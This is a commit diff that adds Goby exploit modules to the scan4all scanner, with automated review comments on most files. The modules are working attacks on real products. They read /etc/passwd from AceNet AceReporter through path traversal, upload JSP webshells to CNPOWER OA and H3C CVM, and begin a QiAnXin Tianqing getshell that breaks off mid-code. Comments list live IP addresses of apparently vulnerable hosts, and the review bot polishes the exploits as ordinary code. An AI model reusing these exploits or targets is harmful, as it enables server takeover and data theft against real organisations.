Projects STRLCPY scan4all Commits 3ee9041f
    lib/goby/goby_pocs/AceNet_AceReporter_Report_component_Arbitrary_file_download.txt
     1 +package exploits
     2 + 
     3 +import (
     4 + "git.gobies.org/goby/goscanner/goutils"
     5 +)
     6 + 
     7 +func init() {
     8 + expJson := `{
     9 + "Name": "AceNet AceReporter Report component Arbitrary file download",
     10 + "Description": "All firewall devices that use the AceNet AceReporter report component can download arbitrary files",
     11 + "Product": "AceNet AceReporter Report component",
     12 + "Homepage": "",
     13 + "DisclosureDate": "2021-08-04",
     14 + "Author": "[email protected]",
     15 + "GobyQuery": "title=\"Login @ Reporter\" || title=\"Technology, Inc.\"",
     16 + "Level": "2",
     17 + "Impact": "<p><span style=\"font-size: 14px;\">The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory (..</span><span style=\"font-size: 14px;\">\\ or..</span><span style=\"font-size: 14px;\">/) to download or read a file beyond the original specified path.</span><span style=\"font-size: 14px;\">The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system.</span><br></p>",
     18 + "Recommandation": "<p><span style=\"font-size: 14px;\">Limit ..</span><span style=\"font-size: 14px;\">/ symbol is used to determine the input path when the file is downloaded. The best method is that the file should be one to one in the database, and avoid entering the absolute path to obtain the file</span><br></p>",
     19 + "References": [
     20 + "https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972"
     21 + ],
     22 + "HasExp": true,
     23 + "ExpParams": [
     24 + {
     25 + "name": "path",
     26 + "type": "createSelect",
     27 + "value": "../../../../../../../../../etc/passwd,../../../../../../../../../etc/hosts",
     28 + "show": ""
     29 + }
     30 + ],
     31 + "ExpTips": {
     32 + "Type": "",
     33 + "Content": ""
     34 + },
     35 + "ScanSteps": [
     36 + "AND",
     37 + {
     38 + "Request": {
     39 + "method": "GET",
     40 + "uri": "/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename=data.txt",
     41 + "follow_redirect": true,
     42 + "header": {},
     43 + "data_type": "text",
     44 + "data": ""
     45 + },
     46 + "ResponseTest": {
     47 + "type": "group",
     48 + "operation": "AND",
     49 + "checks": [
     50 + {
     51 + "type": "item",
     52 + "variable": "$body",
     53 + "operation": "contains",
     54 + "value": "root",
     55 + "bz": ""
     56 + },
     57 + {
     58 + "type": "item",
     59 + "variable": "$body",
     60 + "operation": "contains",
     61 + "value": "daemon",
     62 + "bz": ""
     63 + }
     64 + ]
     65 + },
     66 + "SetVariable": []
     67 + },
     68 + {
     69 + "Request": {
     70 + "method": "GET",
     71 + "uri": "/view/action/download_file.php?filename=../../../../../../../../../etc/hosts&savename=data.txt",
     72 + "follow_redirect": true,
     73 + "header": {},
     74 + "data_type": "text",
     75 + "data": ""
     76 + },
     77 + "ResponseTest": {
     78 + "type": "group",
     79 + "operation": "AND",
     80 + "checks": [
     81 + {
     82 + "type": "item",
     83 + "variable": "$code",
     84 + "operation": "==",
     85 + "value": "200",
     86 + "bz": ""
     87 + },
     88 + {
     89 + "type": "item",
     90 + "variable": "$body",
     91 + "operation": "contains",
     92 + "value": "127.0.0.1",
     93 + "bz": ""
     94 + }
     95 + ]
     96 + },
     97 + "SetVariable": []
     98 + }
     99 + ],
     100 + "ExploitSteps": [
     101 + "AND",
     102 + {
     103 + "Request": {
     104 + "method": "GET",
     105 + "uri": "/view/action/download_file.php?filename={{{path}}}&savename=data.txt",
     106 + "follow_redirect": true,
     107 + "header": {},
     108 + "data_type": "text",
     109 + "data": ""
     110 + },
     111 + "SetVariable": [
     112 + "output|lastbody"
     113 + ]
     114 + }
     115 + ],
     116 + "Tags": [
     117 + "file download"
     118 + ],
     119 + "CVEIDs": null,
     120 + "CVSSScore": "0.0",
     121 + "AttackSurfaces": {
     122 + "Application": null,
     123 + "Support": null,
     124 + "Service": null,
     125 + "System": null,
     126 + "Hardware": null
     127 + }
     128 +}`
     129 + 
     130 + ExpManager.AddExploit(NewExploit(
     131 + goutils.GetFileName(),
     132 + expJson,
     133 + nil,
     134 + nil,
     135 + ))
     136 +}
     137 + 
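Review bot: The key `"Recommandation"` at file line 18 is spelled differently from the `"Recommendation"` key used by the other descriptors in this commit, so if the loader matches keys exactly the remediation text is dropped without any error; rename it to `"Recommendation"`. Because the file carries a `.txt` extension it is neither compiled nor JSON-validated at build time, so a typo like this is only caught by review. The schema also diverges from the sibling files (`"CVEIDs": null` here versus `[""]` elsewhere, and no `"VulType"` or `"Translation"` block); a Go comment above `expJson` listing the fields the loader requires would help keep the corpus uniform.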
    lib/goby/goby_pocs/CNPOWER OA Arbitrary File Upload Vulnerability.txt
     1 +package exploits
     2 + 
     3 +import (
     4 + "git.gobies.org/goby/goscanner/goutils"
     5 + "git.gobies.org/goby/goscanner/jsonvul"
     6 + "git.gobies.org/goby/goscanner/scanconfig"
     7 + "git.gobies.org/goby/httpclient"
     8 + "regexp"
     9 + "strings"
     10 +)
     11 + 
     12 +func init() {
     13 + expJson := `{
     14 + "Name": "CNPOWER OA Arbitrary File Upload Vulnerability",
     15 + "Description": "<p>Huatian power collaborative office system combines advanced management ideas, management modes, software technology and network technology to provide users with a low-cost and efficient collaborative office and management platform.&nbsp;Wise managers have achieved good results in strengthening standardized workflow, strengthening team execution, promoting fine management and promoting business growth through the use of Huatian power collaborative office platform.<br></p><p>There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.<br></p>",
     16 + "Product": "CNPOWER-OA",
     17 + "Homepage": "http://www.oa8000.com/",
     18 + "DisclosureDate": "2022-07-22",
     19 + "Author": "toto",
     20 + "FofaQuery": "body=\"/OAapp/WebObjects/OAapp.woa\" || body=\"/OAapp/htpages/app\"",
     21 + "GobyQuery": "body=\"/OAapp/WebObjects/OAapp.woa\" || body=\"/OAapp/htpages/app\"",
     22 + "Level": "2",
     23 + "Impact": "<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
     24 + "Recommendation": "<p>The manufacturer has not provided a vulnerability repair plan. Please pay attention to the update of the manufacturer's homepage:</p><p><a href=\"http://www.oa8000.com/\">http://www.oa8000.com/</a></p>",
     25 + "References": [
     26 + "http://www.oa8000.com"
     27 + ],
     28 + "Is0day": false,
     29 + "HasExp": true,
     30 + "ExpParams": [
     31 + {
     32 + "name": "fileContent",
     33 + "type": "input",
     34 + "value": "<%out.println(\"123\");%>",
     35 + "show": ""
     36 + }
     37 + ],
     38 + "ExpTips": {
     39 + "Type": "",
     40 + "Content": ""
     41 + },
     42 + "ScanSteps": [
     43 + "OR",
     44 + {
     45 + "Request": {
     46 + "method": "GET",
     47 + "uri": "/test.php",
     48 + "follow_redirect": true,
     49 + "header": {},
     50 + "data_type": "text",
     51 + "data": ""
     52 + },
     53 + "ResponseTest": {
     54 + "type": "group",
     55 + "operation": "AND",
     56 + "checks": [
     57 + {
     58 + "type": "item",
     59 + "variable": "$code",
     60 + "operation": "==",
     61 + "value": "200",
     62 + "bz": ""
     63 + },
     64 + {
     65 + "type": "item",
     66 + "variable": "$body",
     67 + "operation": "contains",
     68 + "value": "test",
     69 + "bz": ""
     70 + }
     71 + ]
     72 + },
     73 + "SetVariable": []
     74 + }
     75 + ],
     76 + "ExploitSteps": [
     77 + "AND",
     78 + {
     79 + "Request": {
     80 + "method": "GET",
     81 + "uri": "/test.php",
     82 + "follow_redirect": true,
     83 + "header": {},
     84 + "data_type": "text",
     85 + "data": ""
     86 + },
     87 + "ResponseTest": {
     88 + "type": "group",
     89 + "operation": "AND",
     90 + "checks": [
     91 + {
     92 + "type": "item",
     93 + "variable": "$code",
     94 + "operation": "==",
     95 + "value": "200",
     96 + "bz": ""
     97 + },
     98 + {
     99 + "type": "item",
     100 + "variable": "$body",
     101 + "operation": "contains",
     102 + "value": "test",
     103 + "bz": ""
     104 + }
     105 + ]
     106 + },
     107 + "SetVariable": []
     108 + }
     109 + ],
     110 + "Tags": [
     111 + "File Upload"
     112 + ],
     113 + "VulType": [
     114 + "File Upload"
     115 + ],
     116 + "CVEIDs": [
     117 + ""
     118 + ],
     119 + "CNNVD": [
     120 + ""
     121 + ],
     122 + "CNVD": [
     123 + ""
     124 + ],
     125 + "CVSSScore": "9.8",
     126 + "Translation": {
     127 + "CN": {
     128 + "Name": "华天动力 OA 任意文件上传漏洞",
     129 + "Product": "华天动力-OA",
     130 + "Description": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。<br></span></p><p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">华天动力 OA&nbsp;</span><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>",
     131 + "Recommendation": "<p>目前官方尚未发布安全补丁,请关注厂商更新。<a href=\"http://www.oa8000.com/\">http://www.oa8000.com/</a></p>",
     132 + "Impact": "<p>华天动力 OA 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</p>",
     133 + "VulType": [
     134 + "⽂件上传"
     135 + ],
     136 + "Tags": [
     137 + "⽂件上传"
     138 + ]
     139 + },
     140 + "EN": {
     141 + "Name": "CNPOWER OA Arbitrary File Upload Vulnerability",
     142 + "Product": "CNPOWER-OA",
     143 + "Description": "<p>Huatian power collaborative office system combines advanced management ideas, management modes, software technology and network technology to provide users with a low-cost and efficient collaborative office and management platform.&nbsp;Wise managers have achieved good results in strengthening standardized workflow, strengthening team execution, promoting fine management and promoting business growth through the use of Huatian power collaborative office platform.<br></p><p>There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.<br></p>",
     144 + "Recommendation": "<p>The manufacturer has not provided a vulnerability repair plan. Please pay attention to the update of the manufacturer's homepage:</p><p><a href=\"http://www.oa8000.com/\">http://www.oa8000.com/</a></p>",
     145 + "Impact": "<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
     146 + "VulType": [
     147 + "File Upload"
     148 + ],
     149 + "Tags": [
     150 + "File Upload"
     151 + ]
     152 + }
     153 + },
     154 + "AttackSurfaces": {
     155 + "Application": null,
     156 + "Support": null,
     157 + "Service": null,
     158 + "System": null,
     159 + "Hardware": null
     160 + }
     161 +}`
     162 + 
     163 + getOAFilePath98234u293 := func(host *httpclient.FixUrl) string {
     164 + requestConfig := httpclient.NewPostRequestConfig("/OAapp/jsp/upload.jsp")
     165 + requestConfig.VerifyTls = false
     166 + requestConfig.FollowRedirect = false
     167 + requestConfig.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundary5Ur8laykKAWws2QO")
     168 + requestConfig.Data = "------WebKitFormBoundary5Ur8laykKAWws2QO\r\nContent-Disposition: form-data; name=\"file\"; filename=\"xxx.xml\"\r\nContent-Type: image/png\r\n\r\nreal path\r\n------WebKitFormBoundary5Ur8laykKAWws2QO\r\nContent-Disposition: form-data; name=\"filename\"\r\n\r\nxxx.png\r\n------WebKitFormBoundary5Ur8laykKAWws2QO--\r\n"
     169 + 
     170 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
     171 + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, ".dat") {
     172 + if path := regexp.MustCompile(`(.*?)Tomcat/webapps/.*?\.dat`).FindStringSubmatch(resp.RawBody); len(path) > 1 {
     173 + // 直接返回文件最后一个 jsessionid
     174 + return path[1]
     175 + } else if path := regexp.MustCompile(`(.*?)htoadata/appdata/.*?\.dat`).FindStringSubmatch(resp.RawBody); len(path) > 1 {
     176 + return path[1]
     177 + }
     178 + }
     179 + }
     180 + 
     181 + return ""
     182 + }
     183 + 
     184 + exploitUploadFile837276342783 := func(path string, fileContent string, host *httpclient.FixUrl) bool {
     185 + 
     186 + requestConfig := httpclient.NewPostRequestConfig("/OAapp/htpages/app/module/trace/component/fileEdit/ntkoupload.jsp")
     187 + requestConfig.VerifyTls = false
     188 + requestConfig.FollowRedirect = false
     189 + requestConfig.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryzRSYXfFlXqk6btQm")
     190 + requestConfig.Data = "------WebKitFormBoundaryzRSYXfFlXqk6btQm\r\nContent-Disposition: form-data; name=\"EDITFILE\"; filename=\"xxx.txt\"\r\nContent-Type: image/png\r\n\r\n" + fileContent + "\r\n------WebKitFormBoundaryzRSYXfFlXqk6btQm\r\nContent-Disposition: form-data; name=\"newFileName\"\r\n\r\n" + path + "Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp\r\n------WebKitFormBoundaryzRSYXfFlXqk6btQm--\r\n"
     191 + 
     192 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
     193 + return resp.StatusCode == 200
     194 + }
     195 + 
     196 + return false
     197 + }
     198 + 
     199 + checkUploadedFile2398764278 := func(fileContent string, host *httpclient.FixUrl) bool {
     200 + requestConfig := httpclient.NewGetRequestConfig("/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp")
     201 + requestConfig.VerifyTls = false
     202 + requestConfig.FollowRedirect = false
     203 + 
     204 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
     205 + return resp.StatusCode == 200 && strings.Contains(resp.RawBody, fileContent)
     206 + }
     207 + 
     208 + return false
     209 + }
     210 + 
     211 + ExpManager.AddExploit(NewExploit(
     212 + goutils.GetFileName(),
     213 + expJson,
     214 + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
     215 + 
     216 + path := getOAFilePath98234u293(u)
     217 + if path == "" {
     218 + path = "D:/htoa/"
     219 + }
     220 + 
     221 + rand := goutils.RandomHexString(6)
     222 + 
     223 + if exploitUploadFile837276342783(path, "<%out.print(\""+rand+"\");%>", u) {
     224 + return checkUploadedFile2398764278(rand, u)
     225 + 
     226 + }
     227 + 
     228 + return false
     229 + },
     230 + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
     231 + 
     232 + fileContent := ss.Params["fileContent"].(string)
     233 + 
     234 + path := getOAFilePath98234u293(expResult.HostInfo)
     235 + if path == "" {
     236 + path = "D:/htoa/"
     237 + }
     238 + 
     239 + if exploitUploadFile837276342783(path, fileContent, expResult.HostInfo) {
     240 + expResult.Success = true
     241 + expResult.Output = "文件已上传,请访问:/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp"
     242 + }
     243 + 
     244 + return expResult
     245 + },
     246 + ))
     247 +}
     248 + 
     249 +// http://36.133.113.253:8081
     250 +// http://221.229.120.251:800/
     251 +// http://winnertoke.com:6001/
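Review bot: The type assertion `ss.Params["fileContent"].(string)` at file line 232 panics inside the exploit callback when the parameter is absent or not a string; use the comma-ok form, `fileContent, ok := ss.Params["fileContent"].(string)` followed by `if !ok { return expResult }`. The two `regexp.MustCompile` calls at lines 172 and 175 recompile on every call of the closure and belong at package scope as `var` patterns. Every `httpclient.DoHttpRequest` error in this file is folded into a bare `false` or `""` return, so a network or TLS failure reads the same as "not vulnerable"; returning or logging the error would make scan results interpretable. The detection callback at lines 214–229 overwrites `normalLoginPageForOther.jsp` on the target, a destructive side effect for a scan-phase check that should at least be stated in a comment on `exploitUploadFile837276342783`. The trailing comments at lines 249–251 are live host addresses and should not be committed with the code.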
    lib/goby/goby_pocs/H3C CVM Arbitrary File Upload Vulnerability.txt
     1 +package exploits
     2 + 
     3 +import (
     4 + "git.gobies.org/goby/goscanner/goutils"
     5 + "git.gobies.org/goby/goscanner/jsonvul"
     6 + "git.gobies.org/goby/goscanner/scanconfig"
     7 + "git.gobies.org/goby/httpclient"
     8 + "strings"
     9 +)
     10 + 
     11 +func init() {
     12 + expJson := `{
     13 + "Name": "H3C CVM Arbitrary File Upload Vulnerability",
     14 + "Description": "<p><span style=\"color: var(--primaryFont-color);\">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style=\"color: var(--primaryFont-color);\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
     15 + "Product": "H3C-CVM",
     16 + "Homepage": "http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/",
     17 + "DisclosureDate": "2022-05-25",
     18 + "Author": "[email protected]",
     19 + "FofaQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")",
     20 + "GobyQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")",
     21 + "Level": "3",
     22 + "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
     23 + "Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
     24 + "References": [
     25 + "https://fofa.so/"
     26 + ],
     27 + "Is0day": false,
     28 + "HasExp": true,
     29 + "ExpParams": [
     30 + {
     31 + "name": "fileName",
     32 + "type": "input",
     33 + "value": "evil",
     34 + "show": ""
     35 + },
     36 + {
     37 + "name": "fileContent",
     38 + "type": "input",
     39 + "value": "<%out.println(\"123\");%>",
     40 + "show": ""
     41 + }
     42 + ],
     43 + "ExpTips": {
     44 + "Type": "",
     45 + "Content": ""
     46 + },
     47 + "ScanSteps": [
     48 + "AND",
     49 + {
     50 + "Request": {
     51 + "method": "GET",
     52 + "uri": "/test.php",
     53 + "follow_redirect": true,
     54 + "header": {},
     55 + "data_type": "text",
     56 + "data": ""
     57 + },
     58 + "ResponseTest": {
     59 + "type": "group",
     60 + "operation": "AND",
     61 + "checks": [
     62 + {
     63 + "type": "item",
     64 + "variable": "$code",
     65 + "operation": "==",
     66 + "value": "200",
     67 + "bz": ""
     68 + },
     69 + {
     70 + "type": "item",
     71 + "variable": "$body",
     72 + "operation": "contains",
     73 + "value": "test",
     74 + "bz": ""
     75 + }
     76 + ]
     77 + },
     78 + "SetVariable": []
     79 + }
     80 + ],
     81 + "ExploitSteps": [
     82 + "AND",
     83 + {
     84 + "Request": {
     85 + "method": "GET",
     86 + "uri": "/test.php",
     87 + "follow_redirect": true,
     88 + "header": {},
     89 + "data_type": "text",
     90 + "data": ""
     91 + },
     92 + "ResponseTest": {
     93 + "type": "group",
     94 + "operation": "AND",
     95 + "checks": [
     96 + {
     97 + "type": "item",
     98 + "variable": "$code",
     99 + "operation": "==",
     100 + "value": "200",
     101 + "bz": ""
     102 + },
     103 + {
     104 + "type": "item",
     105 + "variable": "$body",
     106 + "operation": "contains",
     107 + "value": "test",
     108 + "bz": ""
     109 + }
     110 + ]
     111 + },
     112 + "SetVariable": []
     113 + }
     114 + ],
     115 + "Tags": [
     116 + "Arbitrary File Creation"
     117 + ],
     118 + "VulType": [
     119 + "Arbitrary File Creation"
     120 + ],
     121 + "CVEIDs": [
     122 + ""
     123 + ],
     124 + "CNNVD": [
     125 + ""
     126 + ],
     127 + "CNVD": [
     128 + ""
     129 + ],
     130 + "CVSSScore": "8.0",
     131 + "Translation": {
     132 + "CN": {
     133 + "Name": "H3C CVM 前台任意文件上传漏洞",
     134 + "Product": "H3C-CVM",
     135 + "Description": "<p>H3C 公司依托其强大的技术实力、 产品与服务优势, 以及深入人心的以客户为中心的理念, 为企业数据中心 IaaS 云计算基础架构 提供最优化的虚拟化与云业务运营解决方案。 通过 H3C CAS CVM 虚拟化管理系统实现数据中心虚拟化环境的中央管理控制, 以 简洁的管理界面, 统一管理数据中心内所有的物理资源和虚拟资源, 不仅能提高管理员的管控能力、 简化日常例行工作, 更可降低 IT 环境的复杂度和管理成本。<br></p><p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C CVM&nbsp;存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>",
     136 + "Recommendation": "<p>目前官方尚未发布安全补丁,请关注厂商更新。<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
     137 + "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\"><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C CVM</span><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">&nbsp;</span>存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>",
     138 + "VulType": [
     139 + "⽂件上传"
     140 + ],
     141 + "Tags": [
     142 + "⽂件上传"
     143 + ]
     144 + },
     145 + "EN": {
     146 + "Name": "H3C CVM Arbitrary File Upload Vulnerability",
     147 + "Product": "H3C-CVM",
     148 + "Description": "<p><span style=\"color: var(--primaryFont-color);\">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style=\"color: var(--primaryFont-color);\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
     149 + "Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
     150 + "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
     151 + "VulType": [
     152 + "Arbitrary File Creation"
     153 + ],
     154 + "Tags": [
     155 + "Arbitrary File Creation"
     156 + ]
     157 + }
     158 + },
     159 + "AttackSurfaces": {
     160 + "Application": null,
     161 + "Support": null,
     162 + "Service": null,
     163 + "System": null,
     164 + "Hardware": null
     165 + }
     166 +}`
     167 + 
     168 + exploitUploadFile2398429842 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
     169 + 
     170 + // 上传文件
     171 + requestConfig := httpclient.NewPostRequestConfig("/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/" + fileName + ".jsp&name=222")
     172 + requestConfig.VerifyTls = false
     173 + requestConfig.FollowRedirect = false
     174 + requestConfig.Header.Store("Content-range", "bytes 0-10/20")
     175 + requestConfig.Header.Store("Referer", "http://"+host.HostInfo+"/cas/login")
     176 + requestConfig.Data = fileContent
     177 + 
     178 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
     179 + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "\"success\\\":true") {
     180 + return true
     181 + }
     182 + }
     183 + 
     184 + return false
     185 + }
     186 + 
     187 + checkUploadFile12312313810923 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
     188 + 
     189 + requestConfig := httpclient.NewGetRequestConfig("/" + fileName)
     190 + requestConfig.VerifyTls = false
     191 + requestConfig.FollowRedirect = false
     192 + 
     193 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
     194 + return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent)
     195 + }
     196 + 
     197 + return false
     198 + }
     199 + 
     200 + ExpManager.AddExploit(NewExploit(
     201 + goutils.GetFileName(),
     202 + expJson,
     203 + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
     204 + 
     205 + rand := goutils.RandomHexString(6)
     206 + rand2 := goutils.RandomHexString(6)
     207 + 
     208 + if exploitUploadFile2398429842(rand2, "<%out.print(\""+rand+"\");%>", u) {
     209 + return checkUploadFile12312313810923("/cas/js/lib/buttons/"+rand2+".jsp", rand, u)
     210 + }
     211 + 
     212 + return false
     213 + },
     214 + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
     215 + 
     216 + fileContent := ss.Params["fileContent"].(string)
     217 + fileName := ss.Params["fileName"].(string)
     218 + 
     219 + if exploitUploadFile2398429842(fileName, fileContent, expResult.HostInfo) {
     220 + 
     221 + expResult.Success = true
     222 + expResult.Output = "文件上传已成功,请检查路径:/cas/js/lib/buttons/" + fileName + ".jsp"
     223 + }
     224 + 
     225 + return expResult
     226 + },
     227 + ))
     228 +}
     229 + 
     230 +// http://183.63.173.141:8080/
     231 +// https://60.190.202.42:8443/
     232 +// http://61.53.232.5:28080/
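Review bot: The verification path is built twice: the caller at file line 209 passes `"/cas/js/lib/buttons/"+rand2+".jsp"` and `checkUploadFile12312313810923` at line 189 prepends another `/`, so the request goes to `//cas/js/lib/buttons/…`; drop the leading slash on one side. The user-supplied `fileName` parameter is spliced into the request path at line 171 without validation or `url.PathEscape`, so a value containing `/`, `?` or `&` silently changes the request; reject anything but a short alphanumeric name before use. The assertions `ss.Params["fileContent"].(string)` and `ss.Params["fileName"].(string)` at lines 216–217 panic when a parameter is missing; use the comma-ok form. The literal `"\"success\\\":true"` at line 179 matches a JSON-escaped `\"success\":true` rather than plain `"success":true` — presumably the response nests JSON inside a string, which deserves a comment so the next maintainer does not "fix" it. The trailing live host addresses at lines 230–232 should not be committed.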
    lib/goby/goby_pocs/QiAnXin_Tianqing_terminal_security_management_system_client_upload_file.json_getshell.txt
     1 +package exploits
     2 + 
     3 +import (
     4 + "fmt"
     5 + "git.gobies.org/goby/goscanner/goutils"
     6 + "git.gobies.org/goby/goscanner/jsonvul"
     7 + "git.gobies.org/goby/goscanner/scanconfig"
     8 + "git.gobies.org/goby/httpclient"
     9 + "strings"
     10 +)
     11 + 
     12 +func init() {
     13 + expJson := `{
     14 + "Name": "QiAnXin Tianqing terminal security management system client_upload_file.json getshell",
     15 + "Description": "There is an arbitrary file upload vulnerability in QiAnXin Tianqing terminal security management system, and the attacker can upload his own webshell to control the server.",
     16 + "Product": "360-TianQing",
     17 + "Homepage": "https://www.qianxin.com/product/detail/pid/49",
     18 + "DisclosureDate": "2021-04-09",
     19 + "Author": "[email protected]",
     20 + "FofaQuery": "app=\"360-TianQing\"",
     21 + "GobyQuery": "app=\"360-TianQing\"",
     22 + "Level": "3",
     23 + "Impact": "",
     24 + "Recommendation": "",
     25 + "References": [
     26 + "http://fofa.so"
     27 + ],
     28 + "HasExp": true,
     29 + "ExpParams": [
     30 + {
     31 + "name": "cmd",
     32 + "type": "input",
     33 + "value": "whoami"
     34 + }
     35 + ],
     36 + "ExpTips": {
     37 + "Type": "",
     38 + "Content": ""
     39 + },
     40 + "ScanSteps": [
     41 + "AND",
     42 + {
     43 + "Request": {
     44 + "data": "",
     45 + "data_type": "text",
     46 + "follow_redirect": true,
     47 + "method": "GET",
     48 + "uri": "/"
     49 + },
     50 + "ResponseTest": {
     51 + "checks": [
     52 + {
     53 + "bz": "",
     54 + "operation": "==",
     55 + "type": "item",
     56 + "value": "200",
     57 + "variable": "$code"
     58 + }
     59 + ],
     60 + "operation": "AND",
     61 + "type": "group"
     62 + }
     63 + }
     64 + ],
     65 + "ExploitSteps": null,
     66 + "Tags": ["getshell"],
     67 + "CVEIDs": null,
     68 + "CVSSScore": "0.0",
     69 + "AttackSurfaces": {
     70 + "Application": ["360-TianQing"],
     71 + "Support": null,
     72 + "Service": null,
     73 + "System": null,
     74 + "Hardware": null
     75 + }
     76 +}`
     77 + 
     78 + ExpManager.AddExploit(NewExploit(
     79 + goutils.GetFileName(),
     80 + expJson,
     81 + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
     82 + randomFilename := goutils.RandomHexString(4)
     83 + cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=3cb95cfbe1035bce8c448fcaf80fe7d9&filename=../../lua/%s.LUAC", randomFilename))
     84 + cfg.VerifyTls = false
     85 + cfg.FollowRedirect = false
     86 + cfg.Header.Store("Referer", u.FixedHostInfo)
